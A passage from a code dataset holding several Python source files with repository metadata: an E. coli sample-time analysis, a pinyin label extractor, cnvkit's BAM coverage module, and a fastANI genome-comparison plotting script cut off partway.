scipy.stats\n\n\ndef check_sample_times(df=None, to_plot=False):\n '''\n Investigates whether there is a relationship between the time a\n sample was taken and the E. coli reading. A possible hypothesis\n being that samples taken later in the day might tend to read be\n higher.\n\n The conclusions from this function seem to indicate that there\n is not a subtantial relationship between sample time and E.\n coli reading.\n\n Inputs\n ------\n df : Dataframe object, should contain at least the columns\n 'Client.ID', 'Escherichia.coli', 'Sample.Collection.Time',\n if df is None, then it will be read in from read_data.\n to_plot : Boolean, if true, the results will be printed and\n plotted. Otherwise, just the cleansed dataframe will\n be returned.\n\n Returns\n -------\n ct : Dataframe of collection times and E. coli readings.\n The column 'Sample.Collection.Time' is the fraction of the day,\n for example, a value of 0.50 indicates the collection happened\n at noon, a value of 0.25 would indicate 6:00 AM, etc.\n '''\n if df is None:\n df = rd.read_data()\n\n ct = df[['Client.ID', 'Escherichia.coli', 'Sample.Collection.Time']].dropna()\n\n def clean_times(s):\n '''\n Takes in a string from the sample collection column and\n makes it machine readable if possible, and a NaN otherwise\n '''\n if type(s) is not str:\n if type(s) is dt.datetime or type(s) is dt.time:\n return dt.datetime(2016, 1, 1, hour=s.hour, minute=s.minute)\n\n try:\n if ':' not in s:\n return float('nan')\n i = s.index(':')\n hr = int(s[max(i - 2, 0):i])\n mn = int(s[i+1:i+3])\n\n return dt.datetime(2016, 1, 1, hour=hr, minute=mn)\n except:\n return float('nan')\n\n ct['Sample.Collection.Time'] = ct['Sample.Collection.Time'].map(clean_times)\n ct = ct.dropna()\n ct['Sample.Collection.Time'] = ct['Sample.Collection.Time'].map(\n lambda x: x.hour / 24. + x.minute / (24. * 60.)\n )\n # Filter out those samples which came before 4:00 AM or after 8:00 PM\n # It seems like most of the ones that come from before 4:00 AM might\n # actually be occuring in the afternoon. I've tried taking these and manually\n # changing them to the afternoon and there was no significant change in results.\n ct = ct[(ct['Sample.Collection.Time'] > .125) & (ct['Sample.Collection.Time'] < .83)]\n\n if to_plot:\n # t-test\n ct_low = ct[ct['Escherichia.coli'] < 235]\n ct_high = ct[ct['Escherichia.coli'] >= 235]\n ttest = scipy.stats.ttest_ind(ct_low['Sample.Collection.Time'],\n ct_high['Sample.Collection.Time'])\n print('tests comparing below threshold to above threshold:')\n print('\\tOVERALL:')\n print('\\tt-statistic: {0}\\n\\tp-value : {1}'.format(ttest[0], ttest[1]))\n\n low_mean = ct_low['Sample.Collection.Time'].mean()\n low_mean_hr = int(low_mean * 24)\n low_mean_min = str(int((low_mean * 24 - low_mean_hr) * 60))\n if len(low_mean_min) < 2:\n low_mean_min = '0' + low_mean_min\n print('\\tbelow thresh mean: {0} ({1})'.format(\n low_mean, str(low_mean_hr) + ':' + low_mean_min\n ))\n high_mean = ct_high['Sample.Collection.Time'].mean()\n high_mean_hr = int(high_mean * 24)\n high_mean_min = str(int((high_mean * 24 - high_mean_hr) * 60))\n if len(high_mean_min) < 2:\n high_mean_min = '0' + high_mean_min\n print('\\tbelow thresh mean: {0} ({1})'.format(\n high_mean, str(high_mean_hr) + ':' + high_mean_min\n ))\n\n ttests = []\n for b in ct['Client.ID'].dropna().unique().tolist():\n xl = ct_low[ct_low['Client.ID'] == b]\n xh = ct_high[ct_high['Client.ID'] == b]\n ttests.append(scipy.stats.ttest_ind(xl['Sample.Collection.Time'],\n xh['Sample.Collection.Time']))\n ttest = ttests[-1]\n print('\\t' + b)\n print('\\t\\tt-statistic: {0}\\n\\t\\tp-value : {1}'.format(ttest[0], ttest[1]))\n plt.hist(map(lambda x: x[1], ttests))\n\n # qq-plot\n x = []\n y = []\n for p in np.linspace(0,1,1000):\n x.append(ct_low['Sample.Collection.Time'].quantile(p))\n y.append(ct_high['Sample.Collection.Time'].quantile(p))\n ax = plt.subplots(1)[1]\n ax.plot([0, 1], [0, 1], 'r--')\n ax.hold(True)\n ax.plot(x, y)\n ax.set_xlabel('Below Threshold Quantiles')\n ax.set_ylabel('Above Threshold Quantiles')\n ax.set_aspect('equal')\n\n # set e coli to log scale\n ct['Escherichia.coli'] = ct['Escherichia.coli'].map(lambda x: np.log(x + 1.))\n\n # correlations\n print('Correlations between log(E. coli) and Sample collection time:')\n print('\\tPearson correlation : ' + str(ct.corr(method='pearson').ix[0,1]))\n print('\\tSpearman correlation: ' + str(ct.corr(method='spearman').ix[0,1]))\n\n # scatter plot\n ct.plot(y='Escherichia.coli', x='Sample.Collection.Time', style='.')\n ax = plt.gca()\n ax.set_xlim([ct['Sample.Collection.Time'].min(), ct['Sample.Collection.Time'].max()])\n\n # histograms\n tb = viz.TO_BLOCK\n viz.TO_BLOCK = False\n fig, ax = viz.plot_beach(columns='Sample.Collection.Time', df=ct)\n viz.TO_BLOCK = tb\n ax.legend_.remove()\n plt.show(tb)\n ct['Escherichia.coli'] = ct['Escherichia.coli'].map(lambda x: np.exp(x) - 1.)\n\n return ct\n\n\nif __name__ == '__main__':\n check_sample_times(to_plot=True)\n","repo_name":"meineke/bootcamp-messy-data","sub_path":"python_src/data_investigations.py","file_name":"data_investigations.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"13993401097","text":"import argparse\n\n\ndef extract_pinyin_lables(source, target):\n \"\"\"Extract pinyin labels from Baker's prosody labeling.\"\"\"\n with open(source, 'rt', encoding='utf-8') as fin:\n with open(target, 'wt', encoding='utf-8') as fout:\n for i, line in enumerate(fin):\n if i % 2 == 0:\n sentence_id, raw_text = line.strip().split()\n fout.write(f'{sentence_id} ')\n else:\n transcription = line.strip()\n fout.write(f'{transcription}\\n')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"extract baker pinyin labels\")\n parser.add_argument(\n \"input\", type=str, help=\"source file of baker's prosody label file\")\n parser.add_argument(\n \"output\", type=str, help=\"target file to write pinyin lables\")\n args = parser.parse_args()\n extract_pinyin_lables(args.input, args.output)\n","repo_name":"muweilin/DeepSpeech","sub_path":"examples/chinese_g2p/local/extract_pinyin_label.py","file_name":"extract_pinyin_label.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"2170060235","text":"\"\"\"Supporting functions for the 'antitarget' command.\"\"\"\nimport logging\nimport math\nimport os.path\nimport time\nfrom concurrent import futures\nfrom io import StringIO\n\nimport numpy as np\nimport pandas as pd\nimport pysam\nfrom skgenome import tabio\n\nfrom . import core, samutil\nfrom .cnary import CopyNumArray as CNA\nfrom .parallel import rm, to_chunks\nfrom .params import NULL_LOG2_COVERAGE\n\n\ndef do_coverage(\n bed_fname, bam_fname, by_count=False, min_mapq=0, processes=1, fasta=None\n):\n \"\"\"Calculate coverage in the given regions from BAM read depths.\"\"\"\n if not samutil.ensure_bam_sorted(bam_fname, fasta=fasta):\n raise RuntimeError(f\"BAM file {bam_fname} must be sorted by coordinates\")\n samutil.ensure_bam_index(bam_fname)\n # ENH: count importers.TOO_MANY_NO_COVERAGE & warn\n cnarr = interval_coverages(\n bed_fname, bam_fname, by_count, min_mapq, processes, fasta\n )\n return cnarr\n\n\ndef interval_coverages(bed_fname, bam_fname, by_count, min_mapq, processes, fasta=None):\n \"\"\"Calculate log2 coverages in the BAM file at each interval.\"\"\"\n meta = {\"sample_id\": core.fbase(bam_fname)}\n start_time = time.time()\n\n # Skip processing if the BED file is empty\n with open(bed_fname) as bed_handle:\n for line in bed_handle:\n if line.strip():\n break\n else:\n logging.info(\n \"Skip processing %s with empty regions file %s\",\n os.path.basename(bam_fname),\n bed_fname,\n )\n return CNA.from_rows([], meta_dict=meta)\n\n # Calculate average read depth in each bin\n if by_count:\n results = interval_coverages_count(\n bed_fname, bam_fname, min_mapq, processes, fasta\n )\n read_counts, cna_rows = zip(*results)\n read_counts = pd.Series(read_counts)\n cnarr = CNA.from_rows(\n list(cna_rows), columns=CNA._required_columns + (\"depth\",), meta_dict=meta\n )\n else:\n table = interval_coverages_pileup(\n bed_fname, bam_fname, min_mapq, processes, fasta\n )\n read_len = samutil.get_read_length(bam_fname, fasta=fasta)\n read_counts = table[\"basecount\"] / read_len\n table = table.drop(\"basecount\", axis=1)\n cnarr = CNA(table, meta)\n\n # Log some stats\n tot_time = time.time() - start_time\n tot_reads = read_counts.sum()\n logging.info(\n \"Time: %.3f seconds (%d reads/sec, %s bins/sec)\",\n tot_time,\n int(round(tot_reads / tot_time, 0)),\n int(round(len(read_counts) / tot_time, 0)),\n )\n logging.info(\n \"Summary: #bins=%d, #reads=%d, mean=%.4f, min=%s, max=%s\",\n len(read_counts),\n tot_reads,\n (tot_reads / len(read_counts)),\n read_counts.min(),\n read_counts.max(),\n )\n tot_mapped_reads = samutil.bam_total_reads(bam_fname, fasta=fasta)\n if tot_mapped_reads:\n logging.info(\n \"Percent reads in regions: %.3f (of %d mapped)\",\n 100.0 * tot_reads / tot_mapped_reads,\n tot_mapped_reads,\n )\n else:\n logging.info(\"(Couldn't calculate total number of mapped reads)\")\n\n return cnarr\n\n\ndef interval_coverages_count(bed_fname, bam_fname, min_mapq, procs=1, fasta=None):\n \"\"\"Calculate log2 coverages in the BAM file at each interval.\"\"\"\n regions = tabio.read_auto(bed_fname)\n if procs == 1:\n bamfile = pysam.AlignmentFile(bam_fname, \"rb\", reference_filename=fasta)\n for chrom, subregions in regions.by_chromosome():\n logging.info(\n \"Processing chromosome %s of %s\", chrom, os.path.basename(bam_fname)\n )\n for count, row in _rdc_chunk(bamfile, subregions, min_mapq):\n yield [count, row]\n else:\n with futures.ProcessPoolExecutor(procs) as pool:\n args_iter = (\n (bam_fname, subr, min_mapq, fasta)\n for _c, subr in regions.by_chromosome()\n )\n for chunk in pool.map(_rdc, args_iter):\n for count, row in chunk:\n yield [count, row]\n\n\ndef _rdc(args):\n \"\"\"Wrapper for parallel.\"\"\"\n return list(_rdc_chunk(*args))\n\n\ndef _rdc_chunk(bamfile, regions, min_mapq, fasta=None):\n if isinstance(bamfile, str):\n bamfile = pysam.AlignmentFile(bamfile, \"rb\", reference_filename=fasta)\n for chrom, start, end, gene in regions.coords([\"gene\"]):\n yield region_depth_count(bamfile, chrom, start, end, gene, min_mapq)\n\n\ndef region_depth_count(bamfile, chrom, start, end, gene, min_mapq):\n \"\"\"Calculate depth of a region via pysam count.\n\n i.e. counting the number of read starts in a region, then scaling for read\n length and region width to estimate depth.\n\n Coordinates are 0-based, per pysam.\n \"\"\"\n\n def filter_read(read):\n \"\"\"True if the given read should be counted towards coverage.\"\"\"\n return not (\n read.is_duplicate\n or read.is_secondary\n or read.is_unmapped\n or read.is_qcfail\n or read.mapq < min_mapq\n )\n\n count = 0\n bases = 0\n for read in bamfile.fetch(reference=chrom, start=start, end=end):\n if filter_read(read):\n count += 1\n # Only count the bases aligned to the region\n bases += sum(1 for p in read.positions if start <= p < end)\n depth = bases / (end - start) if end > start else 0\n row = (\n chrom,\n start,\n end,\n gene,\n math.log(depth, 2) if depth else NULL_LOG2_COVERAGE,\n depth,\n )\n return count, row\n\n\ndef interval_coverages_pileup(bed_fname, bam_fname, min_mapq, procs=1, fasta=None):\n \"\"\"Calculate log2 coverages in the BAM file at each interval.\"\"\"\n logging.info(\"Processing reads in %s\", os.path.basename(bam_fname))\n if procs == 1:\n table = bedcov(bed_fname, bam_fname, min_mapq, fasta)\n else:\n chunks = []\n with futures.ProcessPoolExecutor(procs) as pool:\n args_iter = (\n (bed_chunk, bam_fname, min_mapq, fasta)\n for bed_chunk in to_chunks(bed_fname)\n )\n for bed_chunk_fname, table in pool.map(_bedcov, args_iter):\n chunks.append(table)\n rm(bed_chunk_fname)\n table = pd.concat(chunks, ignore_index=True)\n # Fill in CNA required columns\n if \"gene\" in table:\n table[\"gene\"] = table[\"gene\"].fillna(\"-\")\n else:\n table[\"gene\"] = \"-\"\n # User-supplied bins might be zero-width or reversed -- skip those\n spans = table.end - table.start\n ok_idx = spans > 0\n table = table.assign(depth=0, log2=NULL_LOG2_COVERAGE)\n table.loc[ok_idx, \"depth\"] = table.loc[ok_idx, \"basecount\"] / spans[ok_idx]\n ok_idx = table[\"depth\"] > 0\n table.loc[ok_idx, \"log2\"] = np.log2(table.loc[ok_idx, \"depth\"])\n return table\n\n\ndef _bedcov(args):\n \"\"\"Wrapper for parallel.\"\"\"\n bed_fname = args[0]\n table = bedcov(*args)\n return bed_fname, table\n\n\ndef bedcov(bed_fname, bam_fname, min_mapq, fasta=None):\n \"\"\"Calculate depth of all regions in a BED file via samtools (pysam) bedcov.\n\n i.e. mean pileup depth across each region.\n \"\"\"\n # Count bases in each region; exclude low-MAPQ reads\n cmd = [bed_fname, bam_fname]\n if min_mapq and min_mapq > 0:\n cmd.extend([\"-Q\", bytes(min_mapq)])\n if fasta:\n cmd.extend([\"--reference\", fasta])\n try:\n raw = pysam.bedcov(*cmd, split_lines=False)\n except pysam.SamtoolsError as exc:\n raise ValueError(\n f\"Failed processing {bam_fname!r} coverages in {bed_fname!r} regions. \"\n f\"PySAM error: {exc}\"\n ) from exc\n if not raw:\n raise ValueError(\n f\"BED file {bed_fname!r} chromosome names don't match any in \"\n f\"BAM file {bam_fname!r}\"\n )\n columns = detect_bedcov_columns(raw)\n table = pd.read_csv(StringIO(raw), sep=\"\\t\", names=columns, usecols=columns)\n return table\n\n\ndef detect_bedcov_columns(text):\n \"\"\"Determine which 'bedcov' output columns to keep.\n\n Format is the input BED plus a final appended column with the count of\n basepairs mapped within each row's region. The input BED might have 3\n columns (regions without names), 4 (named regions), or more (arbitrary\n columns after 'gene').\n \"\"\"\n firstline = text[: text.index(\"\\n\")]\n tabcount = firstline.count(\"\\t\")\n if tabcount < 3:\n raise RuntimeError(f\"Bad line from bedcov:\\n{firstline!r}\")\n if tabcount == 3:\n return [\"chromosome\", \"start\", \"end\", \"basecount\"]\n if tabcount == 4:\n return [\"chromosome\", \"start\", \"end\", \"gene\", \"basecount\"]\n # Input BED has arbitrary columns after 'gene' -- ignore them\n fillers = [f\"_{i}\" for i in range(1, tabcount - 3)]\n return [\"chromosome\", \"start\", \"end\", \"gene\"] + fillers + [\"basecount\"]\n","repo_name":"etal/cnvkit","sub_path":"cnvlib/coverage.py","file_name":"coverage.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":434,"dataset":"github-code","pt":"81"} +{"seq_id":"31080213671","text":"import argparse, sys, random\nfrom collections import defaultdict\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np, pandas as pd; np.random.seed(0)\nimport seaborn as sns; sns.set(style=\"white\", color_codes=True)\nfrom scipy.stats import pearsonr as corr\nfrom pygam import LinearGAM\n\n\n\"\"\"\n# Set the default sans-serif font to Helvetica\nmatplotlib.rcParams['font.sans-serif'] = \"Helvetica\"\n# Set default font to sans-serif\nmatplotlib.rcParams['font.family'] = \"sans-serif\"\n\"\"\"\n\nclass TickRedrawer(matplotlib.artist.Artist):\n #https://stackoverflow.com/questions/19677963/\n #matplotlib-keep-grid-lines-behind-the-graph-but-the-y-and-x-axis-above\n \"\"\"Artist to redraw ticks.\"\"\"\n\n __name__ = \"ticks\"\n\n zorder = 10\n\n @matplotlib.artist.allow_rasterization\n def draw(self, renderer: matplotlib.backend_bases.RendererBase) -> None:\n \"\"\"Draw the ticks.\"\"\"\n if not self.get_visible():\n self.stale = False\n return\n\n renderer.open_group(self.__name__, gid=self.get_gid())\n\n for axis in (self.axes.xaxis, self.axes.yaxis):\n loc_min, loc_max = axis.get_view_interval()\n\n for tick in axis.get_major_ticks() + axis.get_minor_ticks():\n if tick.get_visible() and loc_min <= tick.get_loc() <= loc_max:\n for artist in (tick.tick1line, tick.tick2line):\n artist.draw(renderer)\n\n renderer.close_group(self.__name__)\n self.stale = False\n\n\ndef subsample_gpairs(gpairs, npairs, r, xmin, xmax):\n \"\"\" subsample with replacement, r gpairs between [xmin, xmax] ANI \"\"\"\n X = []\n\n while len(X) < r:\n z = random.sample(npairs, 1)[0]\n ani = gpairs[z][1]\n if ani >= xmin and ani <= xmax: X.append(z)\n\n return X\n\ndef gather_subsampled_data(ani_file, xmin, xmax, r, e):\n \"\"\"Reads in the tsv ALLvsAll ANI \"\"\"\n\n print(\"\\nReading data.\")\n name_dict = defaultdict(dict)\n data_dict = {'gpair': [], 'species': [], 'xs': [], 'ys': []}\n\n with open(ani_file, 'r') as f:\n for l in f:\n # split each line by tabs\n X = l.rstrip().split('\\t')\n # get the genome pair names\n qry_genome = X[0]\n ref_genome = X[1]\n species = qry_genome.split('/')[1]\n # total frac column. Keep larger genome as reference\n tfrac = int(X[4])\n # remove self matchs\n if qry_genome == ref_genome: continue\n # compute metrics\n ani = float(X[2])\n # get the shared genome fraction\n shared = float(X[3])\n total = float(X[4])\n ratio = shared / total\n # sort genome file names and combine\n names = [qry_genome, ref_genome]\n names.sort()\n gname = '-'.join(names)\n # record values from only one genome pair.\n # Keep larger genome as reference.\n if tfrac > name_dict[species].get(gname[0], 0):\n # add genome pair to dict\n name_dict[species][gname] = [tfrac, ani, ratio]\n\n for i in range(e):\n # subsample r genome pairs per species and write data to arrays\n for species, gpairs in name_dict.items():\n npairs = list(gpairs.keys())\n vals = gpairs.values()\n # Check for enough genome pairs in ANI range for the species\n # 10 genomes minimum = 45 combinations of genome pairs minimum\n # i[1] = ani\n testani = [i[1] for i in vals if i[1] >= xmin and i[1] <= xmax]\n if len(testani) < 45:\n #X = npairs\n continue\n else:\n X = subsample_gpairs(gpairs, npairs, r, xmin, xmax)\n \n for g in X:\n ani = gpairs[g][1]\n ratio = gpairs[g][2]\n data_dict['gpair'].append(g)\n data_dict['species'].append(species)\n data_dict['xs'].append(ani)\n data_dict['ys'].append(ratio)\n\n\n # convert to dataframe\n df = pd.DataFrame(data_dict)\n df = df[df['xs'] <= xmax] \n df = df[df['xs'] >= xmin]\n n = len(df)\n\n # compute and print out some things\n total_species = set(data_dict['species'])\n filtered_species = set(df['species'].unique())\n diff_species = total_species - filtered_species\n print(f'\\nTotal species in file: {len(total_species)}')\n print(f'Species between {xmin}-{xmax}% ANI: {len(filtered_species)}')\n print(f'Species not included: {diff_species}')\n\n total_genomes = count_genomes(df)\n ratios = get_ratios(df)\n\n print(f'\\n\\nGenome pairs between {xmin}-{xmax}% ANI: {total_genomes}')\n print(f'Genome pair ratio 100%/remaining: {ratios[0]}')\n print(f'Genome pair ratio >99.5%/remaining: {ratios[1]}')\n print(f'Genome pair ratio >99%/remaining: {ratios[2]}')\n\n return df, n\n\n\ndef count_genomes(df):\n\n # use a dict to track unique genome names\n # duplicate keys are automatically replaced\n genome_count = {}\n # get the list of genome pairs\n genome_pair_list = df['gpair'].to_list()\n # read through the list, cut out genome names and store\n for gpair in genome_pair_list:\n X = gpair.split('-')\n g1 = X[0]\n g2 = X[1]\n genome_count[g1] = ''\n genome_count[g2] = ''\n\n total_genomes = len(genome_count)\n\n return total_genomes\n\n\ndef get_ratios(df):\n\n x = df['xs']\n\n x100 = len([i for i in x if i == 100])\n d100 = len([i for i in x if i < 100])\n x995 = len([i for i in x if i >= 99.5])\n d995 = len([i for i in x if i < 99.5])\n x99 = len([i for i in x if i >= 99])\n d99 = len([i for i in x if i < 99])\n\n ratios = [x100/d100, x995/d995, x99/d99]\n\n return ratios\n\n\ndef gather_data(ani_file, xmin, xmax):\n \"\"\"Reads in the tsv ALLvsAll ANI \"\"\"\n\n print(\"\\nReading data.\")\n name_dict = {}\n data_dict = {'gpair': [],'species': [], 'xs': [], 'ys': []}\n\n with open(ani_file, 'r') as f:\n for l in f:\n # split each line by tabs\n X = l.rstrip().split('\\t')\n # get the genome pair names\n qry_genome = X[0]\n ref_genome = X[1]\n species = qry_genome.split('/')[1]\n # total frac column. Keep larger genome as reference\n tfrac = int(X[4]) \n # remove self matchs\n if qry_genome == ref_genome: continue\n # compute metrics\n ani = float(X[2])\n # get the shared genome fraction\n shared = float(X[3])\n total = float(X[4])\n ratio = shared / total\n # sort genome file names and combine\n names = [qry_genome, ref_genome]\n names.sort()\n gname = '-'.join(names)\n # record values from only one genome pair.\n # Keep larger genome as reference.\n if tfrac > name_dict.get(gname[0], 0):\n # add genome pair to dict\n name_dict[gname] = [tfrac, ani, ratio, species]\n\n # write data to arrays\n for gpair, metrics in name_dict.items():\n ani = metrics[1]\n ratio = metrics[2]\n species = metrics[3]\n data_dict['xs'].append(ani)\n data_dict['ys'].append(ratio)\n data_dict['species'].append(species)\n data_dict['gpair'].append(gpair)\n # convert to dataframe\n df = pd.DataFrame(data_dict)\n df = df[df['xs'] <= xmax] \n df = df[df['xs'] >= xmin]\n n = len(df)\n\n # compute and print out some things\n total_species = set(data_dict['species'])\n filtered_species = set(df['species'].unique())\n diff_species = total_species - filtered_species\n print(f'\\nTotal species in file: {len(total_species)}')\n print(f'Species between {xmin}-{xmax}% ANI: {len(filtered_species)}')\n print(f'Species not included: {diff_species}')\n\n total_genomes = count_genomes(df)\n ratios = get_ratios(df)\n\n print(f'\\n\\nGenome pairs between {xmin}-{xmax}% ANI: {total_genomes}')\n print(f'Genome pair ratio 100%/remaining: {ratios[0]}')\n print(f'Genome pair ratio >99.5%/remaining: {ratios[1]}')\n print(f'Genome pair ratio >99%/remaining: {ratios[2]}')\n\n return df, n\n\n\ndef gather_stats(df):\n \"\"\"Computes correlation, mean, and median on df columns xs and ys \"\"\"\n\n # Compute Pearson Correlation Coefficient\n print(\"\\nCalculating statistics.\")\n pcorr = corr(df['xs'], df['ys'])\n\n # Compute ANI mean and median\n ani_mean = np.mean(df['xs'])\n ani_median = np.median(df['xs'])\n frag_mean = np.mean(df['ys'])\n frag_median = np.median(df['ys'])\n\n # Compile dictionairy\n df_stats = {\n 'pcorr': pcorr,\n 'ani_mean': ani_mean,\n 'ani_median': ani_median,\n 'frag_mean': frag_mean,\n 'frag_median': frag_median\n }\n\n print(f\"\\nANI mean: {ani_mean:.2f}\\nANI median: {ani_median:.2f}\")\n print(f\"\\nFrag mean: {frag_mean:.2f}\\nFrag median: {frag_median:.2f}\")\n\n return df_stats\n\n\ndef fastANI_scatter_plot(\n df, n, species, outfile, xmin, xmax, xstep, p , a, z, g, c\n ):\n \"\"\"Takes the data and builds the plot\"\"\"\n\n # Gather Stats\n df_stats = gather_stats(df)\n\n stats_line = (\n f\"Pearson r: {round(df_stats['pcorr'][0], 2)}\\n\"\n f\"p value: {round(df_stats['pcorr'][1], 2)}\"\n )\n\n # Set Colors and markers\n grid_color = '#d9d9d9'\n main_color = '#933b41'\n second_color = '#737373'\n vline_color = '#000000'\n color = '#252525'\n marker = '.' #'o'\n\n # build plot\n gg = sns.JointGrid(x=\"xs\", y=\"ys\", data=df)\n\n # x margin hist plot\n sns.histplot(\n x=df[\"xs\"],\n ax=gg.ax_marg_x,\n legend=False,\n color=color,\n stat='probability'\n )\n # y margin hist plot\n sns.histplot(\n y=df[\"ys\"],\n ax=gg.ax_marg_y,\n legend=False,\n color=color,\n stat='probability'\n )\n # main panel scatter plot\n if z: # density scatter plot with datashader\n print('\\nComputing plot densities.')\n import datashader as ds\n from datashader.mpl_ext import dsshow\n dsartist = dsshow(\n df,\n ds.Point(\"xs\", \"ys\"),\n ds.count(),\n norm=\"log\",\n aspect=\"auto\",\n ax=gg.ax_joint,\n width_scale=3.,\n height_scale=3.\n )\n dsartist.zorder = 2.5\n\n else: # regular scatter plot\n print('\\nPlotting data.')\n gg.ax_joint.plot(\n df[\"xs\"],\n df[\"ys\"],\n marker,\n ms=p,\n alpha=a,\n color=color,\n )\n\n if g:\n # Trendline with pyGAM\n print('\\nCalculating trendline with pyGAM.')\n X = df[\"xs\"].to_numpy()\n X = X[:, np.newaxis]\n y = df[\"ys\"].to_list()\n\n gam = LinearGAM().gridsearch(X, y)\n XX = gam.generate_X_grid(term=0, n=500)\n\n gg.ax_joint.plot(\n XX,\n gam.predict(XX),\n color='#FCEE21',\n linestyle='--',\n linewidth=1.0,\n zorder=2.8\n )\n gg.ax_joint.plot(\n XX,\n gam.prediction_intervals(XX, width=0.95),\n color='#CBCB2C',\n linestyle='--',\n linewidth=1.0,\n zorder=2.8\n )\n r2 = gam.statistics_['pseudo_r2']['explained_deviance']\n GAM_line = f\"GAM Pseudo R-Squared: {r2:.4f}\"\n gg.ax_joint.text(\n 0.75, 0.1, GAM_line,\n fontsize=10, color=second_color,\n verticalalignment='top', horizontalalignment='right',\n transform=gg.ax_joint.transAxes\n )\n\n\n # plot title, labels, text\n species_name = ' '.join(species.split('_'))\n ptitle = f'{species_name} (n={n})'\n gg.ax_marg_x.set_title(ptitle, fontsize=18, y=1.02)\n\n gg.ax_joint.set_xlabel(\n 'Average nucleotide identity (%)',\n fontsize=12, y=-0.02\n )\n gg.ax_joint.set_ylabel(\n 'Shared genome fraction', # 'Shared / total fragments'\n fontsize=12, x=-0.02\n )\n gg.ax_joint.text(\n 0.25, 0.99, stats_line,\n fontsize=10, color=second_color,\n verticalalignment='top', horizontalalignment='right',\n transform=gg.ax_joint.transAxes\n )\n\n # set the axis parameters / style\n hstep = xstep/10\n gg.ax_joint.set_xticks(np.arange(xmin, xmax+hstep, xstep))\n gg.ax_joint.set_xlim(left=xmin-hstep, right=xmax+hstep)\n\n gg.ax_joint.set_yticks(np.arange(0.6, 1.1, 0.1))\n gg.ax_joint.set_ylim(bottom=0.58, top=1.02)\n gg.ax_joint.tick_params(axis='both', labelsize=12)\n gg.ax_joint.tick_params(\n axis='both', which='major', direction='inout', color='k',\n width=2, length=6, bottom=True, left=True, zorder=3\n )\n\n # set grid style\n gg.ax_joint.yaxis.grid(\n which=\"major\", color='#d9d9d9', linestyle='--', linewidth=1\n )\n gg.ax_joint.xaxis.grid(\n which=\"major\", color='#d9d9d9', linestyle='--', linewidth=1\n )\n gg.ax_joint.set_axisbelow(True)\n gg.ax_joint.add_artist(TickRedrawer())\n\n if c:\n # Plot mean and median\n _ = gg.ax_joint.axvline(\n x=df_stats['ani_mean'], ymin=0, ymax=1,\n color=vline_color, linewidth=2, linestyle='--',\n label='Mean'\n )\n _ = gg.ax_joint.axhline(\n y=df_stats['frag_mean'], xmin=0, xmax=1,\n color=vline_color, linewidth=2, linestyle='--',\n )\n _ = gg.ax_joint.axvline(\n x=df_stats['ani_median'], ymin=0, ymax=1,\n color=vline_color, linewidth=2, linestyle=':',\n label='Mean'\n )\n _ = gg.ax_joint.axhline(\n y=df_stats['frag_median'], xmin=0, xmax=1,\n color=vline_color, linewidth=2, linestyle=':',\n )\n\n # Build legend for mean and median\n gg.ax_joint.legend(\n loc='lower left',\n fontsize=12,\n markerscale=1.5,\n numpoints=1,\n frameon=False,\n ncol=2\n )\n\n # adjust layout, save, and close\n gg.fig.set_figwidth(7)\n gg.fig.set_figheight(5)\n gg.savefig(f'{outfile}_{species}.pdf')\n plt.close()\n\n\ndef main():\n\n # Configure Argument Parser\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter\n )\n parser.add_argument(\n '-i', '--input_file',\n help='Please specify the input file!',\n metavar='',\n type=str,\n required=True\n )\n parser.add_argument(\n '-o', '--output_file_prefix',\n help='Please specify the output file prefix!',\n metavar='',\n type=str,\n required=True\n )\n parser.add_argument(\n '-xmin', '--xaxis_minimum',\n help='OPTIONAL: Minimum value to plot on x-axis. (Default=95.0)',\n metavar='',\n type=float,\n default=95.0,\n required=False\n )\n parser.add_argument(\n '-xmax', '--xaxis_maximum',\n help='OPTIONAL: Maximum value to plot on x-axis. (Default=100.0)',\n metavar='',\n type=float,\n default=100.0,\n required=False\n )\n parser.add_argument(\n '-t', '--xaxis_step_size',\n help='OPTIONAL: X-axis ticks step increment. (Default=1.0)',\n metavar='',\n type=float,\n default=1.0,\n required=False\n )\n parser.add_argument(\n '-p', '--point_size',\n help='OPTIONAL: Size of the plotted points (Default=4.0)',\n metavar='',\n type=float,\n default=4.0,\n required=False\n )\n parser.add_argument(\n '-a', '--point_alpha',\n help='OPTIONAL: Alpha value of the plotted points (Default=0.10)',\n metavar='',\n type=float,\n default=0.10,\n required=False\n )\n parser.add_argument(\n '-c', '--add_cross_hairs',\n help='OPTIONAL: Input -c True mean/median cross hairs (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n parser.add_argument(\n '-g', '--generate_GAM_trendline',\n help='OPTIONAL: Input -g True adds trendline with GAM (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n parser.add_argument(\n '-r', '--random_subsample',\n help='OPTIONAL: Set > 1 to plot subsample of r genomes per species.',\n metavar='',\n type=int,\n default=1,\n required=False\n )\n parser.add_argument(\n '-e', '--repeat_subsamples',\n help='OPTIONAL: Repeat subsampling this many times (Default=100).',\n metavar='',\n type=int,\n default=100,\n required=False\n )\n parser.add_argument(\n '-s', '--single_species',\n help='OPTIONAL: Input -s True for single species plots (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n parser.add_argument(\n '-l', '--all_species',\n help='OPTIONAL: Input -l True for all species one plot (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n args=vars(parser.parse_args())\n\n # Do what you came here to do:\n print('\\n\\nRunning Script...\\n')\n\n # define parameters\n infile = args['input_file']\n outfile = args['output_file_prefix']\n single_species = args['single_species']\n all_species = args['all_species']\n xmin = args['xaxis_minimum']\n xmax = args['xaxis_maximum']\n xstep = args['xaxis_step_size']\n p = args['point_size']\n a = args['point_alpha']\n z = None\n c = args['add_cross_hairs']\n g = args['generate_GAM_trendline']\n r = args['random_subsample']\n e = args['repeat_subsamples']\n\n # test params\n if not all_species and not single_species:\n print(\n '\\nNo option specified. Please set -s, -a or both to True.\\n\\n'\n )\n sys.exit(1)\n\n # read in the data\n if r > 1:\n df, n = gather_subsampled_data(infile, 